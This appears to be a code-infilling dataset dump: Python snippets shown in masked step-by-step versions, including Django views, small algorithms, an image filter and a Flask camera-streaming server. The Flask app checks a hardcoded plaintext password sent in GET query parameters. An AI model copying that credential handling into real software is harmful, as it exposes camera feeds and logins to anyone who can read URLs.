sessionName in request.session:\n context[contextName] = request.session[sessionName]\n del request.session[sessionName]\n", "step-5": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.db.models import Q\n\nfrom cvmo import settings\n\nfrom cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry\n\nfrom cvmo.context.plugins import ContextPlugins\nfrom cvmo.context.utils.views import uncache_response\n\nfrom cvmo.context.utils.views import get_list_allowed_abstract\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request))\n\ndef dashboard(request):\n context = {\n 'context_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=False)).order_by('-public', 'name'),\n 'full_abstract_list': get_list_allowed_abstract(request),\n 'my_abstract_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=True)).order_by('name'),\n 'cluster_list': ClusterDefinition.objects.filter(owner=request.user).order_by('-public', 'name'),\n 'machine_list': Machines.objects.filter(owner=request.user)\n }\n context[\"webapi_configurations\"] = settings.WEBAPI_CONFIGURATIONS\n push_to_context(\"redirect_msg_info\", \"msg_info\", context, request)\n push_to_context(\"redirect_msg_error\", \"msg_error\", context, request)\n push_to_context(\"redirect_msg_warning\", \"msg_warning\", context, request)\n push_to_context(\"redirect_msg_confirm\", \"msg_confirm\", context, request)\n\n return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request)))\n\ndef test(request):\n raw = \"<h1>404 - Not found</h1><p>This is not the website you are looking for</p>\"\n return render_to_response('core/raw.html', {'body': raw}, RequestContext(request))\n\ndef push_to_context(sessionName, contextName, context, 
request):\n if sessionName in request.session:\n context[contextName] = request.session[sessionName]\n del request.session[sessionName]\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
import os from pathlib import Path DEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv("PLOTTER_ROOT", "~/.plotter/mainnet"))).resolve()
normal
{ "blob_id": "3a8164299fa51b7d781f2b80d77cfba05b5f6915", "index": 4157, "step-1": "<mask token>\n", "step-2": "<mask token>\nDEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv('PLOTTER_ROOT',\n '~/.plotter/mainnet'))).resolve()\n", "step-3": "import os\nfrom pathlib import Path\nDEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv('PLOTTER_ROOT',\n '~/.plotter/mainnet'))).resolve()\n", "step-4": "import os\nfrom pathlib import Path\n\nDEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv(\"PLOTTER_ROOT\", \"~/.plotter/mainnet\"))).resolve()\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for i in a: if i.isalpha(): b.append(i) else: ind.append(a.index(i)) <|reserved_special_token_0|> for i in ind: c.insert(i, a[i]) print(''.join(c)) <|reserved_special_token_1|> a = input() b = [] ind = [] for i in a: if i.isalpha(): b.append(i) else: ind.append(a.index(i)) c = list(reversed(b)) for i in ind: c.insert(i, a[i]) print(''.join(c))
flexible
{ "blob_id": "8fedaeb13fde117cf6b7ace23b59c26e4aab2bc2", "index": 4492, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in a:\n if i.isalpha():\n b.append(i)\n else:\n ind.append(a.index(i))\n<mask token>\nfor i in ind:\n c.insert(i, a[i])\nprint(''.join(c))\n", "step-3": "a = input()\nb = []\nind = []\nfor i in a:\n if i.isalpha():\n b.append(i)\n else:\n ind.append(a.index(i))\nc = list(reversed(b))\nfor i in ind:\n c.insert(i, a[i])\nprint(''.join(c))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from api import * version_api = api(0) def is_bad_version(v): return version_api.is_bad(v) def first_bad_version(n): # -- DO NOT CHANGE THIS SECTION version_api.n = n # -- api_calls_count = 0 left, right = 1, n while left < right: mid = (left + right) // 2 is_bad = is_bad_version(mid) api_calls_count += 1 if is_bad: right = mid else: left = mid + 1 return left, api_calls_count
normal
{ "blob_id": "df4c03d9faedf2d347593825c7221937a75a9c10", "index": 5360, "step-1": "<mask token>\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\ndef first_bad_version(n):\n version_api.n = n\n api_calls_count = 0\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n if is_bad:\n right = mid\n else:\n left = mid + 1\n return left, api_calls_count\n", "step-3": "<mask token>\nversion_api = api(0)\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\ndef first_bad_version(n):\n version_api.n = n\n api_calls_count = 0\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n if is_bad:\n right = mid\n else:\n left = mid + 1\n return left, api_calls_count\n", "step-4": "from api import *\nversion_api = api(0)\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\ndef first_bad_version(n):\n version_api.n = n\n api_calls_count = 0\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n if is_bad:\n right = mid\n else:\n left = mid + 1\n return left, api_calls_count\n", "step-5": "from api import *\n\nversion_api = api(0)\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\ndef first_bad_version(n):\n# -- DO NOT CHANGE THIS SECTION\n version_api.n = n\n# --\n api_calls_count = 0\n\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n\n if is_bad:\n right = mid\n else:\n left = mid + 1\n\n\n return left, api_calls_count\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/python # coding=utf-8 import re str1 = 'http://www.chinapesticide.org.cn/myquery/querydetail?pdno=' str2 = '&pdrgno=' f = open('aaa.txt', 'r') source = f.read() rr = re.compile(r'open[(\'](.*)[\']') s=rr.findall(source) for line in s: temps = line.split(',') a = temps[0] b = temps[1] print str1 + a.replace('\'', '').strip() + str2 + b.replace('\'','').strip() f.close()
normal
{ "blob_id": "387c48fcf00480a820fb407f5bad1d9f41b28e7a", "index": 9160, "step-1": "#!/usr/bin/python\n# coding=utf-8\n\nimport re\n\nstr1 = 'http://www.chinapesticide.org.cn/myquery/querydetail?pdno='\nstr2 = '&pdrgno='\nf = open('aaa.txt', 'r')\nsource = f.read()\nrr = re.compile(r'open[(\\'](.*)[\\']')\ns=rr.findall(source)\nfor line in s:\n temps = line.split(',')\n a = temps[0]\n b = temps[1]\n print str1 + a.replace('\\'', '').strip() + str2 + b.replace('\\'','').strip()\nf.close()\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def count_words(sentence): sentence = re.findall("\\b[\\w'-]+\\b", sentence.lower().replace('_', ' ')) counts = defaultdict(lambda : 0) for word in sentence: counts[word] += 1 return counts <|reserved_special_token_1|> import re from collections import defaultdict def count_words(sentence): sentence = re.findall("\\b[\\w'-]+\\b", sentence.lower().replace('_', ' ')) counts = defaultdict(lambda : 0) for word in sentence: counts[word] += 1 return counts <|reserved_special_token_1|> import re from collections import defaultdict def count_words(sentence): # extract all the words as per definition sentence = re.findall(r"\b[\w'-]+\b", sentence.lower().replace('_', ' ')) counts = defaultdict(lambda: 0) # Counting the frequency of each words for word in sentence: counts[word] += 1 return counts
flexible
{ "blob_id": "7f5f16ea10980e0ade7357cdae38f47f8d7cdf01", "index": 2446, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n", "step-3": "import re\nfrom collections import defaultdict\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n", "step-4": "import re\nfrom collections import defaultdict\n\ndef count_words(sentence):\n # extract all the words as per definition\n sentence = re.findall(r\"\\b[\\w'-]+\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda: 0)\n\n # Counting the frequency of each words\n for word in sentence:\n counts[word] += 1\n \n return counts\n ", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import math import numpy as np from statistics import median from src.filter.median import quickselect_median def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter, sigma_distance = 7, sigma_color =7 / 200, filter_size=5): """ :param flow: np.float (YX,Height,Width) :param occlusen: (Height, Width) :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width) :param image: np.array(float) (ColorChannel, Height, Width) :param weigth_auxiliary: float > 0 :param weigth_filter: float > 0 :param sigma_distance: float :param sigma_color: float :param filter_size: int :return: flow field """ width = flow.shape[2] height = flow.shape[1] color_channel_count = flow.shape[0] filter_half = int(filter_size / 2) helper_list_size = filter_size ** 2 * 2 helper_flow_x_list = [0.0] * (helper_list_size+1) helper_flow_y_list = [0.0] * (helper_list_size+1) weigths_list = [0.0] * helper_list_size result_flow = np.empty(shape=(2, height, width), dtype=float) for y in range(height): for x in range(width): min_x_compare = max(0, x - filter_half) max_x_compare = min(width, x + filter_half + 1) min_y_compare = max(0, y - filter_half) max_y_compare = min(height, y + filter_half + 1) counter = 0 for y_compare in range(min_y_compare, max_y_compare): for x_compare in range(min_x_compare, max_x_compare): distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2 color_squared_difference = 0 for channel in image: color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2 exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance) exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count) occlusen_current = log_occlusen[y][x] occlusen_compared = log_occlusen[y_compare][x_compare] #weigth = math.exp(-exponent) * occlusen_compared / occlusen_current weigth = math.exp(-exponent+occlusen_compared-occlusen_current) weigths_list[counter] = 
weigth helper_flow_x_list[counter] = flow[1][y_compare][x_compare] helper_flow_y_list[counter] = flow[0][y_compare][x_compare] counter += 1 # See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING # 3.13 n = counter f_x = auxiliary_field[1][y][x] f_y = auxiliary_field[0][y][x] scalar = 1/(2*(weigth_auxiliary / weigth_filter)) for idx_1 in range(n+1): sum = 0 for idx_2 in range(idx_1): sum -= weigths_list[idx_2] for idx_2 in range(idx_1, n): sum += weigths_list[idx_2] helper_flow_x_list[n + idx_1] = f_x + scalar * sum helper_flow_y_list[n + idx_1] = f_y + scalar * sum result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1]) result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1]) print("result_flow") print(result_flow.flatten()) return result_flow
normal
{ "blob_id": "1748c8dfcc3974b577d7bfacb5cabe4404b696bc", "index": 612, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + 
occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n", "step-3": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - 
filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n", "step-4": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,\n sigma_distance = 7, sigma_color =7 / 200, filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: 
(Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n\n filter_half = int(filter_size / 2)\n\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size+1)\n helper_flow_y_list = [0.0] * (helper_list_size+1)\n weigths_list = [0.0] * helper_list_size\n\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n\n counter = 0\n\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2\n\n exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)\n\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n\n #weigth = math.exp(-exponent) * occlusen_compared / occlusen_current\n weigth = math.exp(-exponent+occlusen_compared-occlusen_current)\n weigths_list[counter] = weigth\n\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n\n counter += 1\n\n # See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING\n # 3.13\n\n 
n = counter\n\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1/(2*(weigth_auxiliary / weigth_filter))\n\n for idx_1 in range(n+1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n\n result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])\n print(\"result_flow\")\n print(result_flow.flatten())\n return result_flow\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): dependencies = [('userProfile', '0022_auto_20210823_1858')] operations = [migrations.RemoveField(model_name='subscription', name= 'price_type'), migrations.AddField(model_name='subscription', name= 'price', field=models.ForeignKey(null=True, on_delete=django.db. models.deletion.SET_NULL, to='userProfile.price'))] <|reserved_special_token_1|> from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [('userProfile', '0022_auto_20210823_1858')] operations = [migrations.RemoveField(model_name='subscription', name= 'price_type'), migrations.AddField(model_name='subscription', name= 'price', field=models.ForeignKey(null=True, on_delete=django.db. models.deletion.SET_NULL, to='userProfile.price'))] <|reserved_special_token_1|> # Generated by Django 3.2.5 on 2021-08-28 12:34 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('userProfile', '0022_auto_20210823_1858'), ] operations = [ migrations.RemoveField( model_name='subscription', name='price_type', ), migrations.AddField( model_name='subscription', name='price', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='userProfile.price'), ), ]
flexible
{ "blob_id": "96bb865b66e5d9ba62bab210705338f1799cc490", "index": 7022, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('userProfile', '0022_auto_20210823_1858')]\n operations = [migrations.RemoveField(model_name='subscription', name=\n 'price_type'), migrations.AddField(model_name='subscription', name=\n 'price', field=models.ForeignKey(null=True, on_delete=django.db.\n models.deletion.SET_NULL, to='userProfile.price'))]\n", "step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('userProfile', '0022_auto_20210823_1858')]\n operations = [migrations.RemoveField(model_name='subscription', name=\n 'price_type'), migrations.AddField(model_name='subscription', name=\n 'price', field=models.ForeignKey(null=True, on_delete=django.db.\n models.deletion.SET_NULL, to='userProfile.price'))]\n", "step-5": "# Generated by Django 3.2.5 on 2021-08-28 12:34\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userProfile', '0022_auto_20210823_1858'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='subscription',\n name='price_type',\n ),\n migrations.AddField(\n model_name='subscription',\n name='price',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='userProfile.price'),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import shutil total, used, free = shutil.disk_usage("/") print("Total: %d MiB" % (total // (2**20))) print("Used: %d MiB" % (used // (2**20))) print("Free: %d MiB" % (free // (2**20))) from Camera import Camera import time import cv2 devices = Camera.getDevicesList() print(devices) i=0 Cameras = [] for device in devices: Cameras.append(Camera(i)) i=i+1 time.sleep(1) print("Ilość kamer: " + str(len(Cameras))) import threading ### REST from flask import render_template, Response from flask import Flask, jsonify from flask import abort from flask import request Login = "kamil" Password = "123" tasks = [ { 'id': 1, 'title': u'Buy groceries', 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol', 'done': False }, { 'id': 2, 'title': u'Learn Python', 'description': u'Need to find a good Python tutorial on the web', 'done': False } ] restAppi = Flask(__name__) def gen(task_id): while True: print("Thread runned " + str(task_id)) #get camera frame img = Cameras[task_id].getImg() ret, jpeg = cv2.imencode('.jpg', img) frame = jpeg.tobytes() yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n') @restAppi.route('/video_feed/<int:task_id>') def video_feed(task_id): #print(task_id) return Response(gen(task_id), mimetype='multipart/x-mixed-replace; boundary=frame') @restAppi.route('/camerasPreview', methods=['GET']) def camerasPreview(): login = category = request.args.get('login') password = content_id = request.args.get('password') print(login) print(password) if (login == Login) and password == Password: return render_template("CamerasPreview.html", name = "Kamil", camerasCount = len(Cameras)) else: abort(401); @restAppi.route('/') def index(): return render_template("index.html") @restAppi.route('/todo/api/v1.0/tasks', methods=['GET']) def get_tasks(): return jsonify({'tasks': tasks}) @restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET']) def get_task(task_id): task = [task for task in tasks if task['id'] == task_id] if len(task) == 
0: abort(404) return jsonify({'task': task[0]}) restAppiRunned = False if __name__ == "__main__": threading.Thread(target=restAppi.run(debug=False)).start() #if __name__ == '__main__': # restAppi.run(debug=False)
normal
{ "blob_id": "5cdedce5f984f53b8e26d1580a9040b26023f247", "index": 2910, "step-1": "<mask token>\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\n<mask token>\n", "step-2": "<mask token>\nprint('Total: %d MiB' % (total // 2 ** 20))\nprint('Used: %d MiB' % (used // 2 ** 20))\nprint('Free: %d MiB' % (free // 2 ** 20))\n<mask token>\nprint(devices)\n<mask token>\nfor device in devices:\n Cameras.append(Camera(i))\n i = i + 1\ntime.sleep(1)\nprint('Ilość kamer: ' + str(len(Cameras)))\n<mask token>\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef 
video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\n<mask token>\nif __name__ == '__main__':\n threading.Thread(target=restAppi.run(debug=False)).start()\n", "step-3": "<mask token>\ntotal, used, free = shutil.disk_usage('/')\nprint('Total: %d MiB' % (total // 2 ** 20))\nprint('Used: %d MiB' % (used // 2 ** 20))\nprint('Free: %d MiB' % (free // 2 ** 20))\n<mask token>\ndevices = Camera.getDevicesList()\nprint(devices)\ni = 0\nCameras = []\nfor device in devices:\n Cameras.append(Camera(i))\n i = i + 1\ntime.sleep(1)\nprint('Ilość kamer: ' + str(len(Cameras)))\n<mask token>\nLogin = 'kamil'\nPassword = '123'\ntasks = [{'id': 1, 'title': u'Buy groceries', 'description':\n u'Milk, Cheese, Pizza, Fruit, Tylenol', 'done': False}, {'id': 2,\n 'title': u'Learn Python', 'description':\n u'Need to find a good Python tutorial on the web', 'done': False}]\nrestAppi = Flask(__name__)\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + 
b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\nrestAppiRunned = False\nif __name__ == '__main__':\n threading.Thread(target=restAppi.run(debug=False)).start()\n", "step-4": "import shutil\ntotal, used, free = shutil.disk_usage('/')\nprint('Total: %d MiB' % (total // 2 ** 20))\nprint('Used: %d MiB' % (used // 2 ** 20))\nprint('Free: %d MiB' % (free // 2 ** 20))\nfrom Camera import Camera\nimport time\nimport cv2\ndevices = Camera.getDevicesList()\nprint(devices)\ni = 0\nCameras = []\nfor device in devices:\n Cameras.append(Camera(i))\n i = i + 